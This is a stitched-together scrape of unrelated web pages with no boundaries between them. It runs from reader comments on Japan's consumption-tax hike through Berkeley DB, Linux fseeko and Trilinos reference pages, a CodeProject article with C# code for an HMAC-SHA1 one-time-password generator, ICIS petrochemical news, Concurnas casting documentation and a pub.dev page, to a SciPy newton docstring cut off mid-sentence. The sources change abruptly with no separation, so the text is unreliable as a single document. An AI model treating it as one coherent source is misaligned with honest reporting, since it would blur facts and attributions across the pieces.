These are valid concerns for sure. As of now, the Kantei has raised growth projections for FY2013 from 2.5% to 2.8%. Meanwhile, if consumption tax rate rises as planned, the FY2014 projected growth rate will be 1%. Critics of the tax raise will argue that at a time of meager demand overseas, the government should encourage domestic consumption by slowing implementation of the consumption tax hike. However, a decision not to raise the tax rate at all could spook investors in Japanese government bonds exacerbating doubts about the Abe government's ability to rein in public debt. Interest rates would rise, causing more of the revenue to go towards servicing debt rather than on fiscal stimulus or defense spending (another of PM Abe's priorities), which in turn will hurt growth as well. As an aside, Japan's economic growth in FY2015 is expected to pick up again even with the consumption tax.
In the end, while consumption tax hike is one significant issue for the Abe government with both domestic and international ramifications, the focus should still be on structural reforms that would enable Japan to sustain growth beyond expiration of fiscal stimulus measures, which can't be permanent.
Could spook investors? No.
How do you then explain the constant decrease of interest rate (10-year bonds) without raising consumption tax over the last 15 years?
Besides, Mr. Kuroda and Bank of Japan will absorb the bonds to keep the interest rate increase gradual.
Real GDP for FY2013 is 2.8% while GDP deflator is still -0.2%, indicating Japan is still not out of deflation.
Tax hike will drag Japan back into deep deflation. To me, that is a bigger risk, and completely opposite of what Mr. Abe is trying to accomplish.
Even in the Keynesian ideology of the Economist magazine there is no justification for the Japanese consumption tax (none) - you can not justify it even in your Keynesian system of thought, your support of the consumption tax is simply fanatical worship of the ever expanding state (a rather odd position for a magazine that still pretends to be a Classical Liberal publication dedicated to free markets and rolling back the state).
If you are upset about the national debt in Japan why did you support all the "stimulus" plans of the last 20 years that have done so much to create it?
And why do you still support the credit bubble (and government backed) banking system - with its boom-bust insanity? Why not real Classical Liberalism - where lending is from REAL SAVINGS (not the book keeping tricks of bankers or the government printing press).
And why did you support the expansion of "public services" that have created entitlement bills that will be impossible (impossible - have as many consumption taxes as you like, it will still be impossible) to finance? Was it Walter Bagehot style "concede everything that it safe to concede" politics? In short forget about any genuine Classical Liberalism and just accept the moverment towards collectivism (as long as your personal property is not attacked - indeed perhaps one can get a nice pay-off from the ever expanding state......).
Since the early 1970s government spending in Japan has increased from about 20% of GDP to 43% of GDP - this is an unsustainable growth of government (and you know it).
Yet, rather than suggest any real roll back of government, you pretend that new taxes will solve the problem.
If Abenomics fails, it would be because of tax increase.
If Abenomics fails, Mr. Abe will lose support.
Mr. Abe must increase demand with increased government spending for at least few years.
Getting out of deflation is not as easy as people seem to think ...
I find it funny, in a sad way, that Japan has literally been trying the same thing for about twenty years and are going to just try it again. "Increase government spending and that will solve the problem." Where are the structural reforms to make Japan more competitive? Where are the reforms to open up its services industry to foreign competition? Why does a country that once paved riverbeds because they ran out of things to pave, think that more stimulus is going to finally work after two decades of failure? Have they cleaned up the so-called "zombie banks" yet? As the population declines and there are literally fewer people to buy things year after year, how do they expect to maintain demand, consumption, and deal with inevitable over capacity (esp. of homes in the rural areas as the young move to the cities and the old die off).
You can't get an aging population to spend more (at least not easily), because as more people as a percentage of the population retire that means more people are going on a fixed income. Fixed incomes only really grow in real terms when prices fall. So, convincing people to spend and drive up prices would only lead to a fall in real incomes for a large portion of the country (everyone reliant on bond interest payments for a significant share of their retirement income), thus mitigating the benefits.
There is a good reason the Bank of Japan and the Diet have been reluctant to print money in the past: they know the growing number of the elderly (read: voters) would not be pleased seeing the real return on those trillions of dollars worth of Japanese government bonds they've purchased turn sharply negative. You could possibly see millions of Japanese citizens decide to stop rolling over their government bonds and start moving their money overseas where they could at least get a decent real return (when all the factors of interest rates and currency fluctuations are taken into account) leaving the BoJ no choice but to start monetizing the government's debt, lest interest rates, and thus the share of government revenue devoted to debt servicing, rise too high too quickly and bankrupt the nation.
Many people have said that the fact that the majority of publicly held debt in Japan is held domestically is a good thing. They are immune to the vagaries of foreign opinion. But if Abenomics fails and the country is left with no recourse but default it would be worse for Japan. Keep in mind that one's debt is another's asset. Default destroys wealth for all those holding the bonds, when much of that is the wealth of other, more economically and demographically stable, countries it puts less burden on domestic wealth. If the Japanese government lurches towards default they'd have only themselves to blame, and only their own citizens balance sheets to shatter.
That said, I hope I'm wrong and everything works out fine.
I agree with your general points with one exception: millions of Japanese citizens are highly unlikely (read: nigh impossible) to move their money overseas in search of higher returns. Extremely low (even negative) interest rates in the past have not resulted in major shifts in savings of aging Japanese citizens from domestic to overseas funds.
That still leaves the problem of government debt being too high relative to revenue, hence every tic in the bond market causing hyperventilation in the Japanese government and the journalists covering it.
How the hell on earth is Japan going to default?
Bank of Japan will absorb the government bonds when nobody will.
You better worry about other things ...
I think the most important thing is for Japan to curb wastage. Governments all over the world waste money and then force the bills on the public.
They have "consumption led growth" programs encouraging consumption without understanding that wise investment in Education & Equipment also creates demand and generates returns. They worship Keynes without understanding that Keynesian Economics is defective.
They have unlimited bailouts, where public money is allocated to bad loans and then the public is forced to foot the bills. Perhaps some countries are more under banked than they appear, in the sense a few banks can hold the whole economy at ransom and extort money from the Government.
In this context I think in fact the public must be over taxed already.
Furthermore, Japan still operates nuclear energy plants and has taken the risks of additional pollution in line with western countries. Ancient Philosophers have warned for centuries that human greed would one day destroy earth, but the west and Japan still want to continue their mischief.
New systems to address problems need brains. But Japan has been retaining people with human relations and experience rather than brains. The extreme brainy are a minority, most people prefer people like themselves to do the big jobs, and that would be people with average brains.
I agree with you in opposing "consumption led growth" and opposing tax-and-spend politics, we will have to agree to disagree on nuclear power.
Consumption tax can be seen as very unforgiving. The government collects taxes no matter what the state of economy is in. Even when the people suffer from falling income (deflation), the government takes without mercy.
Finance ministry of Japan and mass media try to threaten the Japanese people who have suffered years of falling income by debt crisis and etc. One of the most common threat is "if Japan fails to increase taxes, interest rates will increase ..."
Well. People only need to know one thing. Government debt has increased while interest rates on government bonds have fallen for the last ten years.
Increasing taxes while in deflation is completely against macroeconomics.
Do not be fooled!
I am disturbed to observe your views expressed in the Economist this week, while recognizing and respecting the weekly magazine as one of the best and most influential media in the world.
Your article does not seem to understand which debt it is talking about. Government debts (or public debts) and national debts (external debts for a country as a whole) are very different, like apples and oranges.
It is true that the Japanese government has issued the largest (government ) debts amounting to about 250% of the GDP. But, at the same time, the Japanese private sectors including domestic firms and households own almost all the government debts. Clearly, the interest payments are transfered from the domestic debtor (the government) to the domestic creditors (the bond holders). What is wrong about it?
Japan is not a debtor, but a creditor. Rather, it is the largest creditor in the world. To repeat, Japan as a whole including not only the government but also the households and corporations, enjoys the largest creditor status in the world thanks to its largest net claims to foreign countries including the UK and the US.
Eventually, (external) debtors have to repay to foreign creditors in the future. You can print domestic currencies. But you cannot print foreign currencies. Is it not evident or simple?
Unlike Japan, Greece has to pay back as a severely indebted nation. It is self evident that Japan does not have to repay to any counties thanks to its creditor status.
Please remember, however, that external debt situation in the UK and the US are not far from the one in Greece, since the two counties have accumulated not insignificant amounts of external debts as a result of the large current account deficits in recent years.
It is not true that the Japans financial crisis after the sales tax hike to 5% in 1997 was caused by the Asian currency crisis. Rather, it was a vicious cycle between the financial crisis trigged by the sale tax hike and the Asian crisis. As for the details, please refer to the international economics textbook written by Krugman and Obstefeld.
Mr. R. Feldman is broadly right in assessing the magnitude of the sales tax hike impacts to the economy. He may be, however, underestimating it. I would argue it could be about minus 1.8% of the GDP since the private consumption represents around 60% of the GDP.
The Japanese economy still faces a large negative output gap, no less than 5% of the GDP. The level of the nominal GDP has just started recovering from the bottom of the current business cycle since the final quarter of 2012. As Keynes put it, boom rather than slum is the time of fiscal tightening.
Monetary easing by the BOJ is not a panacia. 2% inflation targeting with the large fiscal contraction is highly unlikely to succeed in sustainable economic growth in Japan, particularly after April 2014. In fact, the UK experience amply demonstrates such a wrong headed policy by the current administration.
As the largest creditor in the world, Japan can and should increase (government) deficit spending for several years more in the near future until the output gap closes. In fact, Japan should lead our global economic recovery on behalf of the rest of the world. To secure the goal, we need a global support from the world including your magazine.
Yes, we can, and we should do so by resorting to true international policy coordination in line of Swan diagram. But, that will be another story.
Sincerely yours,
" An unscientific straw poll by The Economist found that seven out of ten shoppers in Ginza, a high-end shopping district, were ready for a tax increase, as narrowly preferable to a debt crisis." -- Am quite curious about this straw poll....
I am actually not surprised at the result of this straw poll in Ginza: People who CAN shop in Ginza can afford the Conspumption tax rise, even if it's to 10% in one go. | http://www.economist.com/comment/2111416 | CC-MAIN-2013-48 | en | refinedweb |
#include <db_cxx.h> int DbSite::close();
The
DbSite::close() method
deallocates the DbSite handle. The handle must not be accessed
again after this method is called, regardless of the return value.
Use of this method does not in any way affect the configuration of the site to which the handle refers, or of the replication group in general.
All DbSite handles must be closed before the owning DbEnv handle is closed.
The
DbSite::close()
method either returns a non-zero error value or throws an
exception that encapsulates a non-zero error value on
failure, and returns 0 on success.
The
DbSite::close()
method may fail and throw a DbException
exception, encapsulating one of the following non-zero errors, or return one
of the following non-zero errors:
Replication and Related Methods | http://idlebox.net/2011/apidocs/db-5.2.28.zip/api_reference/CXX/dbsite_close.html | CC-MAIN-2013-48 | en | refinedweb |
Man Page
Manual Section... (3) - page: fseeko
NAMEfseeko, ftello - seek to or report file position
SYNOPSIS
#include <stdio.h> int fseeko(FILE *stream, off_t offset, int whence); off_t ftello(FILE *stream);
DESCRIPTION compilation with
#define _FILE_OFFSET_BITS 64
will turn off_t into a 64-bit type.
RETURN VALUEOn successful completion, fseeko() returns 0, while ftello() returns the current offset. Otherwise, -1 is returned and errno is set to indicate the error.
ERRORSSee the ERRORS in fseek(3).
CONFORMING TOSUSv2, POSIX.1-2001.
NOTESThese functions are found on System V-like systems. They are not present in libc4, libc5, glibc 2.0 but are available since glibc 2.1.
SEE ALSOfseek | http://linux.co.uk/documentation/man-pages/subroutines-3/man-page/?section=3&page=fseeko | CC-MAIN-2013-48 | en | refinedweb |
#include <AbstractLinAlgPack_MatrixSymOp.hpp>
Inheritance diagram for AbstractLinAlgPack::MatrixSymOp:
This interface defines two addition methods to those found in
MatrixOp:
sym_lhs = alpha * op(gpms_rhs') * M * op(gpms_rhs) + beta * sym_lhs
sym_lhs = alpha * op(mwo_rhs') * M * op(mwo_rhs) + beta * sym_lhs
The reason that these methods could not be defined in the
MatrixOp interface is that the lhs matrix matrix argument
sym_lhs is only guaranteed to be symmetric if the rhs matrix argument
M (which is
this matrix) is guaranteed to be symmetric. Since a
MatrixOp matrix object may be unsymmetric (as well as rectangular), it can not implement this operation, only a symmetric matrix can.
Clients should use the provided non-member functions to call the methods and not the methods themselves.
Definition at line 53 of file AbstractLinAlgPack_MatrixSymOp.hpp. | http://trilinos.sandia.gov/packages/docs/r7.0/packages/moocho/src/AbstractLinAlgPack/doc/html/classAbstractLinAlgPack_1_1MatrixSymOp.html | CC-MAIN-2013-48 | en | refinedweb |
At the beginning of 2004, I was working with a small team of Gemplus on the
EAP-SIM authentication protocol. As we were a bit ahead of the market,
our team was reassigned to work with a team of Verisign on a new
authentication method: OTP or One Time Password.
At this time, the existing one time password was a token from RSA that was using a clock to synchronize the passwords.
The lab of Versign came with a very simple but I should say very smart
concept. The OTP that you may be using with your bank or Google was born.
This is this algorithm and authentication method I describe in the following two articles. In this article, I present a complete code of the
OTP generator. It is very similar to the Javacard Applet I wrote
in 2004 when I started to work on this concept with the Versign labs.
This OTP is based on the very popular algorithm HMAC SHA. The HMAC SHA
is an algorithm generally used to perform authentication by challenge
response. It is not an encryption algorithm but a hashing algorithm that
transforms a set of bytes to another set of bytes. This algorithm is
not reversible which means that you cannot use the result to go back to
the source.
A HMAC SHA uses a key to transform an input array of bytes. The key is
the secret that must never be accessible to a hacker and the input is
the challenge. This means that OTP is a challenge response
authentication.
The secret key must be 20 bytes at least; the challenge is usually a
counter of 8 bytes which leaves quite some time before the value is
exhausted.
The algorithm takes the 20 bytes key and the 8 bytes counter to create
a 8 digits number. This means that there will obviously be duplicates
during the life time of the OTP generator but this doesn't matter as no duplicate can occur consecutively
and an OTP is only valid for a couple
of minutes.
There are few reasons why this is a very strong method.
Those few characteristics make the OTP a strong authentication protocol. The weakness in an authentication is usually the
human factor. It is difficult to remember many complex passwords, so
users often use the same one all across the internet and not really
a strong one. With an OTP, you don't have to remember a password,
the most you would have to remember would be PIN code (4 to 8 digits)
if the OTP token is PIN protected. In the case of an OTP sent by a
mobile phone, it is protected by your phone security. A PIN is short but
you can't generally try it more than 3 times before the token is locked.
The weakness of an OTP if there is one, is the media used to generate
or receive the OTP. If the user loses it, then the authentication could
be compromised. A possible solution would be to protect this device
with a biometric credential, making it virtually totally safe.
The code of the OTP generator follows:
public class OTP
{
public const int SECRET_LENGTH = 20;
private const string
MSG_SECRETLENGTH = "Secret must be at least 20 bytes",
MSG_COUNTER_MINVALUE = "Counter min value is 1";
public OTP()
{
}
private static int[] dd = new int[10] { 0, 2, 4, 6, 8, 1, 3, 5, 7, 9 };
private byte[] secretKey = new byte[SECRET_LENGTH]
{
};
private ulong counter = 0x0000000000000001;
private static int checksum(int Code_Digits)
{
int d1 = (Code_Digits/1000000) % 10;
int d2 = (Code_Digits/100000) % 10;
int d3 = (Code_Digits/10000) % 10;
int d4 = (Code_Digits/1000) % 10;
int d5 = (Code_Digits/100) % 10;
int d6 = (Code_Digits/10) % 10;
int d7 = Code_Digits % 10;
return (10 - ((dd[d1]+d2+dd[d3]+d4+dd[d5]+d6+dd[d7]) % 10) ) % 10;
}
/// <summary>
/// Formats the OTP. This is the OTP algorithm.
/// </summary>
/// <param name="hmac">HMAC value</param>
/// <returns>8 digits OTP</returns>
private static string FormatOTP(byte[] hmac)
{
int offset = hmac[19] & 0xf ;
int bin_code = (hmac[offset] & 0x7f) << 24
| (hmac[offset+1] & 0xff) << 16
| (hmac[offset+2] & 0xff) << 8
| (hmac[offset+3] & 0xff) ;
int Code_Digits = bin_code % 10000000;
int csum = checksum(Code_Digits);
int OTP = Code_Digits * 10 + csum;
return string.Format("{0:d08}", OTP);
}
public byte[] CounterArray
{
get
{
return BitConverter.GetBytes(counter);
}
set
{
counter = BitConverter.ToUInt64(value, 0);
}
}
/// <summary>
/// Sets the OTP secret
/// </summary>
public byte[] Secret
{
set
{
if (value.Length < SECRET_LENGTH)
{
throw new Exception(MSG_SECRETLENGTH);
}
secretKey = value;
}
}
/// <summary>
/// Gets the current OTP value
/// </summary>
/// <returns>8 digits OTP</returns>
public string GetCurrentOTP()
{
HmacSha1 hmacSha1 = new HmacSha1();
hmacSha1.Init(secretKey);
hmacSha1.Update(CounterArray);
byte[] hmac_result = hmacSha1.Final();
return FormatOTP(hmac_result);
}
/// <summary>
/// Gets the next OTP value
/// </summary>
/// <returns>8 digits OTP</returns>
public string GetNextOTP()
{
// increment the counter
++counter;
return GetCurrentOTP();
}
/// <summary>
/// Gets/sets the counter value
/// </summary>
public ulong Counter
{
get
{
return counter;
}
set
{
counter = value;
}
}
}
The methods FormatOTP() and checksum() are the heart of the OTP
algorithm. Those methods transform the result of the hmacsha into an 8
digits OTP.
FormatOTP()
checksum()
The attached code also contains an implementation of the HMAC SHA
algorithm. It is of course possible to use the standard hmacsha of the
.NET Framework but the code I provide in fact used a demo in a
prototype of smart card that was running a .NET CLR. At the time I
wrote this code, the cryptography namespace was not yet implemented by
the card.
This way, you can also see how a hmacsha algorithm is implemented.
There are usually 2 ways to perform an authentication with an OTP. I'm
going to describe the real case of an authentication to an online
banking site. I just want to be explicit with something. You cannot use
what I'm going to describe in this post to hack into a banking site! On
the contrary after reading this you should understand why using an OTP
as a second factor authentication is extremely secure.
The OTP by itself is already very secure for at least the 2 following reasons:
The second characteristic is very important in term of security. An OTP depends on 2 parameters:
Even if a hacker intercepts millions of OTP the algorithm is not
reversible which means that even if you know the key you can't go back
to the counter that was used to generate the OTP. So without the key
and the counter, it is virtually impossible even with millions of OTP
to find a pattern to guess the key and the current counter value.
Like many security protocols, the strength of the OTP is given by the
quality of the cryptography algorithm used, in this case HMACSHA1 which
is a proven challenge response algorithm. An other HMAC algorithm can
be used in place of HMACSHA as encryption algorithm have to become
stronger when CPU power is increasing. This can be done by increasing
the size of the key or by redesigning the algorithm itself.
OTP are usually used to perform authentication or to verify a
transaction with a credit card. In the case of a transaction an OTP is
sent to the mobile phone of the user, for an authentication if is
possible to use either a secure token or to request an OTP to be send
to the user phone.
This is usually the authentication method used when a transaction is
verified with an OTP. The bank system sends you an OTP and you then
have few minutes to enter this OTP. This mechanism doesn't need any
synchronization process as the OTP is originally generated by the
server and send to a third party device. The server expects that you
type the correct OTP within generally 2 mns. If you fail to do it, you
just ask a new OTP and then enter it within the given time.
When a system supports both authentication methods, it means that the
back-end has 2 different keys and counters; one pair for the OTP token
and one pair for the OTP transmitted by SMS.
The original product I worked on when we implemented one of
the first versions of the OTP in a Javacard was using an OTP token with a
screen or a mobile phone with a card applet to generate the OTP. In this model
both the server and the authentication token have to generate an OTP that must
be synchronized.
The process is the following: The user generates an OTP with
his token, type it and press OK. The server receives the OTP generated by the
token, it increments the counter and generates a new OTP.
This is where there is a possible synchronization issue.
Synchronization issues
If the user enters the correct OTP, then the server when it
increments the counter and calculate the OTP, the authentication will be
successful.
Now there could be few scenarios that could lead to a
desynchronization of the server counter and the authentication mechanism won't
work. In some cases it could be possible to resynchronize automatically the
counter but in some cases the user would have to resynchronize the server
counter using a specific procedure.
Few scenarios of desynchronization could arise:
If the OTP given by the user doesn't match the one of the
server, the server can try to auto-resynchronize itself by trying few counters
around the expected counter. In our server we would use 10 values around the
nominal counter value. If the synchronization cannot be done, the server would
retain the current counter value in order not desynchronize the server further.
However the server would have to implement a strategy to
inform that the server and token are totally desynchronized and a manual
synchronization must be performed.
Manual synchronization process
The server can propose a manual synchronization
process to the user. The OTP numbers are only 8 digits generated by the hash of
8 bytes counter and formatting a 20 bytes result. This means that it is
possible to get twice the same OTP for 2 different counter values. So
attempting synchronization with only one OTP value is not reliable. A manual
resynchronization process needs the user to enter 2 consecutive OTP, and then
the server can try to find the requested sequence as the probability to get the
same sequence of 2 OTPs for different counter values is extremely low if not
zero.
You can get the source code of the project from the ZIP files
attached to the article or you can follow it on github
where it will be updated regularly as this is a public repository.
OTP is a popular and quite simple authentication method; I hope those
articles will help you understand how it works behind the scenes.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
General News Suggestion Question Bug Answer Joke Rant Admin
Man throws away trove of Bitcoin worth $7.5 million | http://www.codeproject.com/Articles/592275/OTP-One-Time-Password-Demystified | CC-MAIN-2013-48 | en | refinedweb |
28 May 2007 09:17 [Source: ICIS news]
MUMBAI (ICIS news)--India’s Oil and Natural Gas Corporation (ONGC) is in talks with Saudi Basic Industries Corp (SABIC) for its rupees (Rs) 136bn ($3.3bn/€2.5bn) dual-feed olefins complex in Dahej, Gujarat, a source close to the deal said on Monday.
?xml:namespace>
“ONGC is in talks with SABIC and a few other firms for technical, financial and operational collaboration for the Dahej project,” the source told ICIS news.
The Indian firm also plans to appoint an equity advisor to push through with the talks for collaboration, the source said.
Construction for the project will start on ?xml:namespace>
“Stone and Webster, ABB, EPP Samsung, L&T and a few other [South] Korean firms have submitted tenders for the lumpsum turnkey project,” he added.
The selected bidder will have to obtain statutory approval for the project, undertake engineering, procurement of equipment and construction of the entire complex and infrastructure.
The project will be implemented by an ONGC joint venture ONGC Petro-additions Ltd (OPaL), the other partner being Gujarat State Petroleum Corp (GSPC).
($1 = Rs40.52, €1 = Rs52 | http://www.icis.com/Articles/2007/05/28/9032406/indias-ongc-in-talks-with-sabic-for-dahej-project.html | CC-MAIN-2013-48 | en | refinedweb |
05 July 2012 17:09 [Source: ICIS news]
LONDON (ICIS)-European spot acetone prices continue to decline as demand slows, supplies improve and feedstock costs come down, market sources agreed on Thursday.
Prices peaked in March this year because of various planned and unplanned outages on phenol production in ?xml:namespace>
Feedstock propylene prices were also very high during this time.
However, as production resumed to normal levels during the second quarter, acetone spot prices started a gradual decline.
Looking back over the past three years, spot acetone has followed a similar pattern; with notable dips seen around November-December time and peaking in April and May, largely because of production problems occurring around the same time every year.
The direction of feedstock propylene has more of a physiological, rather than direct impact, on spot acetone prices, compared with the acetone contract which is more closely linked to a formula.
However, in recent months the spread between spot acetone and propylene has narrowed and because of this some market followers think that European producers will not allow the prices of spot acetone to drop by much more.
In relation to its current spot prices, an active trader said: “I think prices will bottom out in July and I don’t think they will break €700/tonne ($875/tonne) FD NWE. We are seeing production cutbacks [in phenol] and traders are pushing product because nobody wants volume in their tanks.”
“Demand is lousy and everyone is buying hand-to-mouth because they [the end-users] are expecting even lower prices,” he added.
The trader quoted €760-780/tonne on an FD (free delivered) basis in NWE (northwest
Another trader, based in the ARA (
“I don’t know about this [market] anymore because people are saying different things. Demand is non-existent and sentiment is so negative,” the trader said.
The trader quoted €730-760/tonne FD NWE its market price for this week.
Sentiment was not all doom and gloom: indeed sellers say they can still do business in the €800s/tonne. Some also say their demand for early July has not been so bad.
However, those that have seen a slight boost in their orders books for July, think this could simply be because customers ran their stocks to virtually zero in June in anticipation lower feedstock prices in July.
Inevitably the summer holidays in July and August result demand dip.
In addition exports to Asia remain unworkable with the arbitrage from Europe to
One producer described its demand as “good” and “better than usual”.
“Demand is good, but I am afraid this is only due to previous month where people were trying to understand what was happening and now that are buying again. It’s better than I was expecting, but people are remaining very, very, cautious.”
“Buyers are afraid to put acetone in storage because it might lose value,” the producer added.
Looking ahead to August, the majority of the market is expecting a typical quiet month in terms of demand and pricing.
But the big question mark for the acetone market is the month of September and if this will be a “better” month for the petrochemical sector in general.
In relation to this a European producer said: “For the moment the markets are not under so much pressure, but there are no good signs. I hope September will be good otherwise we risk losing any [positive] results for this year.
On a contractual basis, the July European acetone methyl methacrylate (MMA) contract price has been agreed down by €136/tonne from the June following the €170/tonne drop in the July propylene contract price. The July acetone MMA settlement was agreed at €778/tonne FD NWE.
A major supplier of acetone in
Producers and consumers' interpretations of the balance of the European acetone market were quite different and this had resulted in a tough round of contract price discussions.
The producer said its demand was good and failed to see the length in the market that buyers were talking about. The buyer did not share this view.
Of course, the production of acetone is not determined by acetone demand, but by the demand for its primary phenol.
In the phenol market, producers and consumers have been cutting back on operating rates because global economic concerns have dampened demand for many phenol derivatives, particularly those that are exported to
Competitively priced imports of major phenol derivatives, such as bisphenol A (BPA) and epoxy resins have also impacted on margins and output in these markets.
BPA production accounts for around 40% of phenol demand | http://www.icis.com/Articles/2012/07/05/9575784/acetone-spot-price-falls-under-mixed-market-pressure.html | CC-MAIN-2013-48 | en | refinedweb |
Casting and Checking Types?
Table of Contents
Casting and checking of types enable us to take one type and either check it can be treated as another (via
is and
isnot) or actually be treated as another type (via
as). Intuitively this sounds like not something of much use, however consider the case where an object of type
java.lang.Object is passed to a function which expects an
java.lang.Object argument, but, contingent upon the type of said object uses that object differently. For example:
def doSomething(an Object){ if(an is String){ aString = an as String //... }else if(an is Integer){ anInt = an as Integer //... } }
To implement the above we needed to use both
is and
as1.
Primitive type Implicit and Explicit conversions?
Generally speaking we can use a lower bit width value where a larger bit width value is expected (e.g. in assignment). For example we can implicitly 'upcast 'like this:
anint int =123 along long = anint //implicity 'upcast' to a long
We see above that the value of
anint is converted ('upcast') to a long value. Of course, this makes the following code possible:
expectLong long = 123 //123 is converted to a long value def operateOnLong(along long) => along+1 operateOnLong(123) //123 is converted to a long value
Note however that if we were to attempt a 'downcast' it would be considered a compilation error, as there is the potential for data loss (imagine a long value larger than \(2^{31} - 1\) being stored in an int variable, it's not possible as we don't have enough bits of information):
along = 100l anint int = along //compilation error!
The way to achieve the above is to use an explicit cast in order to convert the value:
along = 100l anint int = along as int
But generally speaking this is not considered a good idea.
Casting boxed types?
Boxed types may be explicitly cast to other boxed types follows:
anInt = Integer(20) asDouble = anInt as Double
This conversion can take place on an implicit basis as long as the cast operation is an 'upcast' (e.g.
Integer to
Long,
Integer to
Double etc). So the following is perfectly acceptable:
def expectsDouble(an Double) => an anInt = Integer(20) expectsDouble(anInt)//this is ok the Integer is 'upcast' to Double
But of the following, representing a 'downcast' is only possible via an explicit cast operation:
def takesInteger(an Integer) => an aDouble = Double(0.32) takesInteger(aDouble) //this is not ok as an implicit 'downcast' is required, potentially losing data takesInteger(aDouble as Integer) //this will work, though is inadvisable
Primitive type operators?
Something that often catches out new programmers is the following scenario, say we wish to perform division, we'd use code like the following and expect to get the result
0.25:
1/4
But actually we'd get the result 0. This is because, by virtue of the fact that both our input primitive types to the division operator are integer, whole number division is applied. If we wish to perform fractional division then we'd need to convert at least one of the inputs to the division operator a floating point number, this is easy to achieve:
1/4.
Now we get the desired result:
0.25
checking and casting for non-primitive Types?
Any object subtype may be implicitly upcast to a supertype. Also, as has been touched upon earlier all non-primitive types are subclasses of type
java.lang.Object. As such this is perfectly valid code:
open class SuperClass class ChildClass < SuperClass inst1 SuperClass = new ChildClass() inst2 Object = new ChildClass()
In cases where we are converting to a non supertype, then the
is and
isnot operators come into play as follows:
something Object = "hi" assert something is String assert something isnot Integer
Once we are sure of the type (either by using
is or by another means) we may wish to cast the object to the type of interest such that we can use it as such (i.e. access fields call methods etc):
something Object = "hi" asString = something as String
When it comes to objects with generic types, we cannot perform a cast on generic type qualifiers. As such types requiring generic type qualification cannot be expressed with qualifiers:
class MyGenClass<X> anObj Object = MyGenClass<String>() check = anObj is MyGenClass<String> //not valid convert = anObj as MyGenClass<String> //also not valid okcheck = anObj is MyGenClass<?> //ok okconvert = anObj as MyGenClass<?> //ok
Function refs, tuples, refs and actors are reified types which makes code like the following possible:
afuncRef Object = def (a int, b int) => a+b checkfuncRef = afuncRef is (int, int) int asafuncRef = afuncRef as (int, int) int aTuple Object = 12, "hi", false checkTuple = aTuple is (int, String, bool) asaTuple (int, String, bool) = aTuple as (int, String, bool) aRef Object = 12: checkRef = aRef is int: asaRef = aRef as int: anActor = actor String() checkActor = anActor is actor String asaActor = anActor as actor String
We can cast an array to be a supertype (unlike lists - due to the restrictions of generic types previously outlined), but care must be taken when assigning values to said array since upon assignment type of the value will be checked so as to ensure that it matches the real component type of the array. This is because when we are casting Objects (which arrays are - they are a Subtype of
java.lang.Object) we are treating them as another type, we are not actually transforming the type itself, thus an
int[] array stays as an
Integer[] array when we cast it to an
Object[].
anArray Object[] = [ 1 2 3 4 5 6 ] as Object[] //this is ok anArray[0] = 99 //this is ok as the type of the array is really Integer[] anArray[1] = "hi" //this is not ok as we cannot set a String value in an Integer[] array
A variable holding a value null can be cast to anything, it will remain null:
nullObj Object = null stillnull String = nullObj as String
Null is considered an instance of any object type:
nullObj Object = null assert nullObj is Integer assert nullObj is String
Checking for multiple types?
Multiple types may be checked for at the same time by using the
or keyword to chain the types together as follows:
open class A trait TT class B < A an Object = new B() inst = an is A or TT
Casting Arrays?
Although it is not possible to directly cast an n dimensional array of primitive type to a differing n dimensional array of primitive type. The effect can nevertheless be achieved via use of vectorization. This will of course create a new n dimensional array:
vec = [ 1.0 2.0 ; 3.0 4.0] res = vec^ as int //res == [ 1 2; 3 4 ]
Is with automatic cast?
is with automatic cast is a massive time saving feature of Concurnas in cases where one has already tested to ensure a variable is of a certain type and now needs to perform operations on said variable with it as cast to the type tested for. If the
is operator is used on a variable in an
if or
elif test, then throughout the remainder of the test and the block associated with the test that variable will be automatically cast for us as the type checked against. Example:
class Dog(~age int) def getAge(an Object){ if(an is Dog){an.age} //an is automatically as cast to type Dog. Thus we do not need an explicit cast else{"unknown"} } getAge(Dog(3)) //returns 3
This also applies to if expressions:
class Dog(~age int) def getAge(an Object){ an.age if(an is Dog) else "unknown" //an is automatically as cast to Dog } getAge(Dog(3))//returns 3
The automatic cast resulting from the is test applies to the remaining body of an if test:
class Treatment(~level int) def matcher(an Object) => 'match' if an is Treatment and an.level > 5 else 'none' [matcher(Treatment(7)), matcher(Treatment(2))] //resolsves to [match, none]
Note that this only applies if the is operator is used on a variable. e.g. This does not apply to values resulting from function calls, array indexes etc.
This also does not apply to is operators used within tests which can be short circuited if the is is referenced past a short-circuit point. For example, the following is invalid:
class Dog(~age int) maybe = true def getAge(an Object){ if(maybe or an is Dog){an.age} //compilation error as required as cast to be used in this way else{"unknown"} } getAge(Dog(3))
Footnotes
1Actually, as we shall see in the Is with automatic cast section later on, the as cast was unnecessary. | https://concurnas.com/docs/castingAndCheckingTypes.html | CC-MAIN-2022-21 | en | refinedweb |
web_browser_detect 1.0.2+1 web_browser_detect: ^1.0.2+1 copied to clipboard
Use this package as a library
Depend on it
Run this command:
With Flutter:
$ flutter pub add web_browser_detect
This will add a line like this to your package's pubspec.yaml (and run an implicit
flutter pub get):
dependencies: web_browser_detect: ^1.0.2+1
Alternatively, your editor might support
flutter pub get. Check the docs for your editor to learn more.
Import it
Now in your Dart code, you can use:
import 'package:web_browser_detect/web_browser_detect.dart'; | https://pub.dev/packages/web_browser_detect/versions/1.0.2+1/install | CC-MAIN-2022-21 | en | refinedweb |
scipy.optimize.newton¶
scipy.optimize.
newton(func, x0, fprime=None, args=(), tol=1.48e-08, maxiter=50, fprime2=None, x1=None, rtol=0.0, full_output=False, disp=True)[source]¶
Find a zero of a real or complex function using the Newton-Raphson (or secant or Halley also provided, then Halley’s method is used.
If x0 is a sequence, then
newtonreturns an array, and func must be vectorized and return a sequence or array of the same shape as its first argument.
Notes
The convergence rate of the Newton-Raphson method is quadratic, the Halley method is cubic, and the secant method is sub-quadratic. This means that if the function is well behaved the actual error in the estimated zero after the n-th iteration is approximately the square (cube for Halley) of the error after the (n-1)-th step..
When
newtonis used with arrays, it is best suited for the following types of problems:
- The initial guesses, x0, are all relatively the same distance from the roots.
- Some or all of the extra arguments, args, are also arrays so that a class of similar problems can be solved together.
- The size of the initial guesses, x0, is larger than O(100) elements. Otherwise, a naive loop may perform as well or better than a vector.
Examples
>>> from scipy import optimize >>> import matplotlib.pyplot as plt
>>> def f(x): ... return (x**3 - 1) # only one real root at x = 1
fprimeis not provided, use the secant method:
